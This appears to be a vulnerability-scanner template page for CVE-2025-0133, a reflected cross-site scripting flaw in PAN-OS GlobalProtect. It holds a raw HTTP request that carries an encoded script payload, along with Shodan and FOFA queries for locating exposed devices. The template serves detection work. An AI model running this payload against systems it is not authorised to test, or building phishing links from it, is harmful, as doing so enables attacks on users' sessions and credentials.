PAN-OS - Reflected Cross-Site Scripting
CVE-2025-0133
Verified
Description
A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.
Severity
Medium
Exploit Probability
4%
Affected Product
pan-os
Published Date
June 13, 2025
Template Author
xbow, dhiyaneshdk
CVE-2025-0133.yaml
id: CVE-2025-0133
info:
name: PAN-OS - Reflected Cross-Site Scripting
author: xbow,DhiyaneshDK
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link.The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN.
reference:
- https://security.paloaltonetworks.com/CVE-2025-0133
- https://hackerone.com/reports/3096384
classification:
epss-score: 0.04363
epss-percentile: 0.88411
metadata:
verified: true
max-request: 1
shodan-query:
- http.favicon.hash:"-631559155"
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
fofa-query: icon_hash="-631559155"
product: pan-os
vendor: paloaltonetworks
tags: hackerone,cve,cve2025,xss,panos,global-protect,vuln
http:
- raw:
- |
GET /ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>prompt("XSS")</script>'
- 'authentication cookie'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022043aab4e254f72b1c8d77b26cef2826ca27a2908b83d7e150570ee04b1c7bc7ce022100d2297b4bf7d39a7a696464896b4aebdf7e088f55c5743070a99103ce550c8a86:922c64590222798bb761d5b6d8e729505.0Severity